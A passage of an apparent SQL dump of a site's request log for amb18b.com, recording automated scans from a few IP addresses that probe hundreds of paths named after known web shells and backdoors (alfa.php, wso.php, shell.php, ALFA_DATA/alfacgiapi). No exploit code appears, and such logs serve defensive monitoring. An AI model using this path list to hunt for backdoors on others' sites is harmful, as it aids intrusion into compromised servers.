10:27:00'),(5838,'https://amb18b.com/akcc.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:01','2025-11-11 10:27:01'),(5839,'https://amb18b.com/abcd.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:02','2025-11-11 10:27:02'),(5840,'https://amb18b.com/aku.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:03','2025-11-11 10:27:03'),(5841,'https://amb18b.com/cord.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:05','2025-11-11 10:27:05'),(5842,'https://amb18b.com/dex.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:06','2025-11-11 10:27:06'),(5843,'https://amb18b.com/zoo.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:08','2025-11-11 10:27:08'),(5844,'https://amb18b.com//zwso.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:09','2025-11-11 10:27:09'),(5845,'https://amb18b.com/wp-admin/zwso.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:10','2025-11-11 10:27:10'),(5846,'https://amb18b.com/bolt.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:13','2025-11-11 10:27:13'),(5847,'https://amb18b.com/shlo.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:14','2025-11-11 10:27:14'),(5848,'https://amb18b.com/133.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:15','2025-11-11 10:27:15'),(5849,'https://amb18b.com/ahax.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:16','2025-11-11 10:27:16'),(5850,'https://amb18b.com/wpssl.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:17','2025-11-11 10:27:17'),(5851,'https://amb18b.com/witmm.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:18','2025-11-11 10:27:18'),(5852,'https://amb18b.com/wp-admin/css/index.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:19','2025-11-11 10:27:19'),(5853,'https://amb18b.com/files.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:21','2025-11-11 10:27:21'),(5854,'https://amb18b.com/wp-editor.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:22','2025-11-11 10:27:22'),(5855,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-11 11:52:00','2025-11-11 11:52:00'),(5856,'https://amb18b.com/wp-plain.php','172.207.123.72','Invalid Referrer',1,'2025-11-11 11:52:00','2025-11-11 11:52:00'),(5857,'https://amb18b.com/','172.207.123.72','Invalid Referrer',2,'2025-11-11 11:52:02','2025-11-11 11:52:01'),(5858,'https://amb18b.com/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-11 11:52:02','2025-11-11 11:52:02'),(5859,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.207.123.72','Direct Access',1,'2025-11-11 11:52:04','2025-11-11 11:52:04'),(5860,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.207.123.72','Direct Access',1,'2025-11-11 11:52:06','2025-11-11 11:52:06'),(5861,'https://amb18b.com/alfa.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:13','2025-11-11 12:14:13'),(5862,'https://amb18b.com/abcd.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:14','2025-11-11 12:14:14'),(5863,'https://amb18b.com/about.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:16','2025-11-11 12:14:16'),(5864,'https://amb18b.com/chosen.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:18','2025-11-11 12:14:18'),(5865,'https://amb18b.com/default.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:19','2025-11-11 12:14:19'),(5866,'https://amb18b.com/ioxi-o.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:20','2025-11-11 12:14:20'),(5867,'https://amb18b.com/xleet.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:22','2025-11-11 12:14:22'),(5868,'https://amb18b.com/ds.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:23','2025-11-11 12:14:23'),(5869,'https://amb18b.com/f5.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:25','2025-11-11 12:14:25'),(5870,'https://amb18b.com/file.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:26','2025-11-11 12:14:26'),(5871,'https://amb18b.com/god4m.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:28','2025-11-11 12:14:28'),(5872,'https://amb18b.com/info.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:30','2025-11-11 12:14:30'),(5873,'https://amb18b.com/modules/','64.227.138.228','Direct Access',1,'2025-11-11 12:14:31','2025-11-11 12:14:31'),(5874,'https://amb18b.com/test1.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:34','2025-11-11 12:14:34'),(5875,'https://amb18b.com/uploads/','64.227.138.228','Direct Access',1,'2025-11-11 12:14:36','2025-11-11 12:14:36'),(5876,'https://amb18b.com/.__info.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:40','2025-11-11 12:14:40'),(5877,'https://amb18b.com/0.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:41','2025-11-11 12:14:41'),(5878,'https://amb18b.com/07.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:43','2025-11-11 12:14:43'),(5879,'https://amb18b.com/dropdown.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:45','2025-11-11 12:14:45'),(5880,'https://amb18b.com/makeasmtp.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:46','2025-11-11 12:14:46'),(5881,'https://amb18b.com/wp-sigunq.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:48','2025-11-11 12:14:48'),(5882,'https://amb18b.com/wso112233.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:50','2025-11-11 12:14:50'),(5883,'https://amb18b.com/alfanew.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:52','2025-11-11 12:14:52'),(5884,'https://amb18b.com/fw.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:54','2025-11-11 12:14:54'),(5885,'https://amb18b.com/install.php','64.227.138.228','Direct Access',1,'2025-11-11 12:14:56','2025-11-11 12:14:56'),(5886,'https://amb18b.com/simple.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:00','2025-11-11 12:15:00'),(5887,'https://amb18b.com/inputs.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:02','2025-11-11 12:15:02'),(5888,'https://amb18b.com/classsmtps.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:04','2025-11-11 12:15:04'),(5889,'https://amb18b.com/wp-blog-header.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:06','2025-11-11 12:15:06'),(5890,'https://amb18b.com/wp-trackback.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:08','2025-11-11 12:15:08'),(5891,'https://amb18b.com/wp-signup.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:11','2025-11-11 12:15:11'),(5892,'https://amb18b.com/edit.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:16','2025-11-11 12:15:16'),(5893,'https://amb18b.com/plugins.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:24','2025-11-11 12:15:24'),(5894,'https://amb18b.com/post.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:27','2025-11-11 12:15:27'),(5895,'https://amb18b.com/admin.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:29','2025-11-11 12:15:29'),(5896,'https://amb18b.com/wp-2019.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:32','2025-11-11 12:15:32'),(5897,'https://amb18b.com/geju.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:33','2025-11-11 12:15:33'),(5898,'https://amb18b.com/wp.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:35','2025-11-11 12:15:35'),(5899,'https://amb18b.com/hoot.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:38','2025-11-11 12:15:38'),(5900,'https://amb18b.com/css.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:41','2025-11-11 12:15:41'),(5901,'https://amb18b.com/log.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:43','2025-11-11 12:15:43'),(5902,'https://amb18b.com/mail.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:46','2025-11-11 12:15:46'),(5903,'https://amb18b.com/bak.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:48','2025-11-11 12:15:48'),(5904,'https://amb18b.com/content.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:50','2025-11-11 12:15:50'),(5905,'https://amb18b.com/upfile.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:53','2025-11-11 12:15:53'),(5906,'https://amb18b.com/wp-conflg.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:56','2025-11-11 12:15:56'),(5907,'https://amb18b.com/bypass.php','64.227.138.228','Direct Access',1,'2025-11-11 12:15:57','2025-11-11 12:15:57'),(5908,'https://amb18b.com/404.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:00','2025-11-11 12:16:00'),(5909,'https://amb18b.com/updates.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:01','2025-11-11 12:16:01'),(5910,'https://amb18b.com/radio.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:03','2025-11-11 12:16:03'),(5911,'https://amb18b.com/xmrlpc.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:05','2025-11-11 12:16:05'),(5912,'https://amb18b.com/ae.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:07','2025-11-11 12:16:07'),(5913,'https://amb18b.com/moon.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:09','2025-11-11 12:16:09'),(5914,'https://amb18b.com/blog.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:11','2025-11-11 12:16:11'),(5915,'https://amb18b.com/themes.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:12','2025-11-11 12:16:13'),(5916,'https://amb18b.com/ini.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:14','2025-11-11 12:16:14'),(5917,'https://amb18b.com/as.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:16','2025-11-11 12:16:16'),(5918,'https://amb18b.com/shell.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:18','2025-11-11 12:16:18'),(5919,'https://amb18b.com/ws.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:19','2025-11-11 12:16:19'),(5920,'https://amb18b.com/1.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:21','2025-11-11 12:16:21'),(5921,'https://amb18b.com/123.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:22','2025-11-11 12:16:22'),(5922,'https://amb18b.com/9.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:24','2025-11-11 12:16:24'),(5923,'https://amb18b.com/aa.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:25','2025-11-11 12:16:25'),(5924,'https://amb18b.com/admin-ajax.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:27','2025-11-11 12:16:27'),(5925,'https://amb18b.com/adminfuns.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:28','2025-11-11 12:16:28'),(5926,'https://amb18b.com/akc.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:30','2025-11-11 12:16:30'),(5927,'https://amb18b.com/akcc.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:32','2025-11-11 12:16:32'),(5928,'https://amb18b.com/asasx.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:33','2025-11-11 12:16:33'),(5929,'https://amb18b.com/asd.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:35','2025-11-11 12:16:35'),(5930,'https://amb18b.com/atomlib.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:36','2025-11-11 12:16:36'),(5931,'https://amb18b.com/autoload_classmap.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:38','2025-11-11 12:16:38'),(5932,'https://amb18b.com/axx.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:40','2025-11-11 12:16:40'),(5933,'https://amb18b.com/berax.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:41','2025-11-11 12:16:41'),(5934,'https://amb18b.com/build.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:42','2025-11-11 12:16:42'),(5935,'https://amb18b.com/buy.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:44','2025-11-11 12:16:44'),(5936,'https://amb18b.com/checkbox.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:45','2025-11-11 12:16:45'),(5937,'https://amb18b.com/classwithtostring.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:47','2025-11-11 12:16:47'),(5938,'https://amb18b.com/cong.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:48','2025-11-11 12:16:48'),(5939,'https://amb18b.com/elp.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:50','2025-11-11 12:16:50'),(5940,'https://amb18b.com/file2.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:51','2025-11-11 12:16:51'),(5941,'https://amb18b.com/file4.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:52','2025-11-11 12:16:52'),(5942,'https://amb18b.com/filemanager.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:54','2025-11-11 12:16:54'),(5943,'https://amb18b.com/flower.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:55','2025-11-11 12:16:55'),(5944,'https://amb18b.com/form.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:56','2025-11-11 12:16:56'),(5945,'https://amb18b.com/gecko.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:58','2025-11-11 12:16:58'),(5946,'https://amb18b.com/goods.php','64.227.138.228','Direct Access',1,'2025-11-11 12:16:59','2025-11-11 12:16:59'),(5947,'https://amb18b.com/kyami.php','64.227.138.228','Direct Access',1,'2025-11-11 12:17:01','2025-11-11 12:17:01'),(5948,'https://amb18b.com/manager.php','64.227.138.228','Direct Access',1,'2025-11-11 12:17:02','2025-11-11 12:17:02'),(5949,'https://amb18b.com/mari.php','64.227.138.228','Direct Access',1,'2025-11-11 12:17:04','2025-11-11 12:17:04'),(5950,'https://amb18b.com/nc4.php','64.227.138.228','Direct Access',1,'2025-11-11 12:17:05','2025-11-11 12:17:05'),(5951,'https://amb18b.com/new.php','64.227.138.228','Direct Access',1,'2025-11-11 12:17:06','2025-11-11 12:17:06'),(5952,'https://amb18b.com/wp-admin.php','64.227.138.228','Direct Access',1,'2025-11-11 12:17:08','2025-11-11 12:17:08'),(5953,'https://amb18b.com/cgi-bin/','64.227.138.228','Direct Access',1,'2025-11-11 12:17:10','2025-11-11 12:17:10'),(5954,'https://amb18b.com/style.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:20','2025-11-11 12:37:20'),(5955,'https://amb18b.com/wp-admin/style.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:27','2025-11-11 12:37:27'),(5956,'https://amb18b.com/wp-includes/style.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:29','2025-11-11 12:37:29'),(5957,'https://amb18b.com/chosen.php?p=','103.186.31.45','Direct Access',1,'2025-11-11 12:37:31','2025-11-11 12:37:31'),(5958,'https://amb18b.com/file.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:32','2025-11-11 12:37:32'),(5959,'https://amb18b.com/flower.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:34','2025-11-11 12:37:34'),(5960,'https://amb18b.com/gifclass.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:35','2025-11-11 12:37:35'),(5961,'https://amb18b.com/bless.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:50','2025-11-11 12:37:50'),(5962,'https://amb18b.com/class-t.api.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:52','2025-11-11 12:37:52'),(5963,'https://amb18b.com/blurbs.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:53','2025-11-11 12:37:53'),(5964,'https://amb18b.com/akcc.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:55','2025-11-11 12:37:55'),(5965,'https://amb18b.com/abcd.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:56','2025-11-11 12:37:56'),(5966,'https://amb18b.com/aku.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:57','2025-11-11 12:37:57'),(5967,'https://amb18b.com/cord.php','103.186.31.45','Direct Access',1,'2025-11-11 12:37:58','2025-11-11 12:37:58'),(5968,'https://amb18b.com/dex.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:00','2025-11-11 12:38:00'),(5969,'https://amb18b.com/zoo.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:01','2025-11-11 12:38:01'),(5970,'https://amb18b.com//zwso.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:02','2025-11-11 12:38:02'),(5971,'https://amb18b.com/wp-admin/zwso.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:04','2025-11-11 12:38:04'),(5972,'https://amb18b.com/bolt.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:07','2025-11-11 12:38:07'),(5973,'https://amb18b.com/shlo.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:09','2025-11-11 12:38:09'),(5974,'https://amb18b.com/133.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:10','2025-11-11 12:38:10'),(5975,'https://amb18b.com/ahax.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:11','2025-11-11 12:38:11'),(5976,'https://amb18b.com/wpssl.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:26','2025-11-11 12:38:26'),(5977,'https://amb18b.com/witmm.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:27','2025-11-11 12:38:27'),(5978,'https://amb18b.com/wp-admin/css/index.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:30','2025-11-11 12:38:30'),(5979,'https://amb18b.com/files.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:32','2025-11-11 12:38:32'),(5980,'https://amb18b.com/wp-editor.php','103.186.31.45','Direct Access',1,'2025-11-11 12:38:33','2025-11-11 12:38:33'),(5981,'https://amb18b.com/?p=16','43.165.65.75','Direct Access',1,'2025-11-11 15:26:22','2025-11-11 15:26:22'),(5982,'https://amb18b.com/link.php','20.222.8.186','Direct Access',2,'2025-11-11 15:55:11','2025-11-11 15:54:28'),(5983,'https://amb18b.com/chosen.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:54:29','2025-11-11 15:54:29'),(5984,'https://amb18b.com/mail.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:31','2025-11-11 15:54:31'),(5985,'https://amb18b.com/lock360.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:32','2025-11-11 15:54:32'),(5986,'https://amb18b.com/function.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:33','2025-11-11 15:54:33'),(5987,'https://amb18b.com/classwithtostring.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:34','2025-11-11 15:54:34'),(5988,'https://amb18b.com/1.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:36','2025-11-11 15:54:36'),(5989,'https://amb18b.com/autoload_classmap.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:54:37','2025-11-11 15:54:37'),(5990,'https://amb18b.com/post.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:38','2025-11-11 15:54:38'),(5991,'https://amb18b.com/wp-conflg.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:54:39','2025-11-11 15:54:39'),(5992,'https://amb18b.com/manager.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:54:40','2025-11-11 15:54:40'),(5993,'https://amb18b.com/alfa.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:42','2025-11-11 15:54:42'),(5994,'https://amb18b.com/goods.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:45','2025-11-11 15:54:45'),(5995,'https://amb18b.com/wp-trackback.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:47','2025-11-11 15:54:47'),(5996,'https://amb18b.com/about.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:54:48','2025-11-11 15:54:48'),(5997,'https://amb18b.com/themes.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:49','2025-11-11 15:54:49'),(5998,'https://amb18b.com/simple.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:52','2025-11-11 15:54:52'),(5999,'https://amb18b.com/class.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:54:53','2025-11-11 15:54:53'),(6000,'https://amb18b.com/as.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:55','2025-11-11 15:54:55'),(6001,'https://amb18b.com/file.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:56','2025-11-11 15:54:56'),(6002,'https://amb18b.com/bless.php','20.222.8.186','Direct Access',1,'2025-11-11 15:54:57','2025-11-11 15:54:57'),(6003,'https://amb18b.com/alfanew.php','20.222.8.186','Direct Access',2,'2025-11-11 15:55:58','2025-11-11 15:54:58'),(6004,'https://amb18b.com/404.php?fm=true','20.222.8.186','Direct Access',1,'2025-11-11 15:55:00','2025-11-11 15:55:00'),(6005,'https://amb18b.com/ini.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:01','2025-11-11 15:55:01'),(6006,'https://amb18b.com/fm.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:55:02','2025-11-11 15:55:02'),(6007,'https://amb18b.com/atomlib.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:04','2025-11-11 15:55:04'),(6008,'https://amb18b.com/inputs.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:55:05','2025-11-11 15:55:05'),(6009,'https://amb18b.com/moon.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:55:06','2025-11-11 15:55:06'),(6010,'https://amb18b.com/lv.php','20.222.8.186','Direct Access',2,'2025-11-11 15:55:57','2025-11-11 15:55:07'),(6011,'https://amb18b.com/cong.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:09','2025-11-11 15:55:09'),(6012,'https://amb18b.com/buy.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:12','2025-11-11 15:55:12'),(6013,'https://amb18b.com/zfile.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:13','2025-11-11 15:55:13'),(6014,'https://amb18b.com/css.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:14','2025-11-11 15:55:14'),(6015,'https://amb18b.com/radio.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:15','2025-11-11 15:55:15'),(6016,'https://amb18b.com/wp.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:17','2025-11-11 15:55:17'),(6017,'https://amb18b.com/abcd.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:18','2025-11-11 15:55:18'),(6018,'https://amb18b.com/nc4.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:19','2025-11-11 15:55:19'),(6019,'https://amb18b.com/wso.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:20','2025-11-11 15:55:20'),(6020,'https://amb18b.com/rss.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:22','2025-11-11 15:55:22'),(6021,'https://amb18b.com/ant.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:23','2025-11-11 15:55:23'),(6022,'https://amb18b.com/ioxi-o.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:24','2025-11-11 15:55:24'),(6023,'https://amb18b.com/wpc.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:55:27','2025-11-11 15:55:27'),(6024,'https://amb18b.com/js.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:29','2025-11-11 15:55:29'),(6025,'https://amb18b.com/ar.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:32','2025-11-11 15:55:32'),(6026,'https://amb18b.com/xmrlpc.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:55:34','2025-11-11 15:55:34'),(6027,'https://amb18b.com/c.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:35','2025-11-11 15:55:35'),(6028,'https://amb18b.com/byp.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:36','2025-11-11 15:55:36'),(6029,'https://amb18b.com/fm1.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:38','2025-11-11 15:55:38'),(6030,'https://amb18b.com/doc.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:39','2025-11-11 15:55:39'),(6031,'https://amb18b.com/Angelv2.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:41','2025-11-11 15:55:41'),(6032,'https://amb18b.com/acp.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:43','2025-11-11 15:55:43'),(6033,'https://amb18b.com/gdn.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:44','2025-11-11 15:55:44'),(6034,'https://amb18b.com/asas.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:45','2025-11-11 15:55:45'),(6035,'https://amb18b.com/123.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:46','2025-11-11 15:55:46'),(6036,'https://amb18b.com/v1.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:48','2025-11-11 15:55:48'),(6037,'https://amb18b.com/v2.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:49','2025-11-11 15:55:49'),(6038,'https://amb18b.com/rk2.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:50','2025-11-11 15:55:50'),(6039,'https://amb18b.com/222.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:55:52','2025-11-11 15:55:52'),(6040,'https://amb18b.com/wp-22.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:53','2025-11-11 15:55:53'),(6041,'https://amb18b.com/lc.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:55','2025-11-11 15:55:55'),(6042,'https://amb18b.com/mini.php','20.222.8.186','Direct Access',1,'2025-11-11 15:55:56','2025-11-11 15:55:56'),(6043,'https://amb18b.com/m.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:00','2025-11-11 15:56:00'),(6044,'https://amb18b.com/db.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:01','2025-11-11 15:56:01'),(6045,'https://amb18b.com/aks.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:03','2025-11-11 15:56:03'),(6046,'https://amb18b.com/f.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:04','2025-11-11 15:56:04'),(6047,'https://amb18b.com/wp-files.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:05','2025-11-11 15:56:05'),(6048,'https://amb18b.com/cloud.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:07','2025-11-11 15:56:07'),(6049,'https://amb18b.com/asa.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:09','2025-11-11 15:56:09'),(6050,'https://amb18b.com/gecko-litespeed.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:10','2025-11-11 15:56:10'),(6051,'https://amb18b.com/bolt.php','20.222.8.186','Direct Access',2,'2025-11-11 15:56:57','2025-11-11 15:56:11'),(6052,'https://amb18b.com/NewFile.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:13','2025-11-11 15:56:13'),(6053,'https://amb18b.com/otuz1.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:14','2025-11-11 15:56:14'),(6054,'https://amb18b.com/classwithtostring.php?p=','20.222.8.186','Direct Access',1,'2025-11-11 15:56:15','2025-11-11 15:56:15'),(6055,'https://amb18b.com/info.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:17','2025-11-11 15:56:17'),(6056,'https://amb18b.com/mlex.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:18','2025-11-11 15:56:18'),(6057,'https://amb18b.com/file1.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:19','2025-11-11 15:56:19'),(6058,'https://amb18b.com/11.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:21','2025-11-11 15:56:21'),(6059,'https://amb18b.com/warm.PhP7','20.222.8.186','Direct Access',1,'2025-11-11 15:56:23','2025-11-11 15:56:23'),(6060,'https://amb18b.com/zxl.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:24','2025-11-11 15:56:24'),(6061,'https://amb18b.com/wp-wso.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:26','2025-11-11 15:56:26'),(6062,'https://amb18b.com/uana.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:28','2025-11-11 15:56:29'),(6063,'https://amb18b.com/a.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:30','2025-11-11 15:56:30'),(6064,'https://amb18b.com/ayk.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:31','2025-11-11 15:56:31'),(6065,'https://amb18b.com/gawean.PhP7','20.222.8.186','Direct Access',1,'2025-11-11 15:56:34','2025-11-11 15:56:34'),(6066,'https://amb18b.com/inc.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:35','2025-11-11 15:56:35'),(6067,'https://amb18b.com/api.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:37','2025-11-11 15:56:37'),(6068,'https://amb18b.com/ioxi-rex4.php7','20.222.8.186','Direct Access',1,'2025-11-11 15:56:38','2025-11-11 15:56:38'),(6069,'https://amb18b.com/million.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:39','2025-11-11 15:56:39'),(6070,'https://amb18b.com/include.php','20.222.8.186','Direct Access',1,'2025-11-11 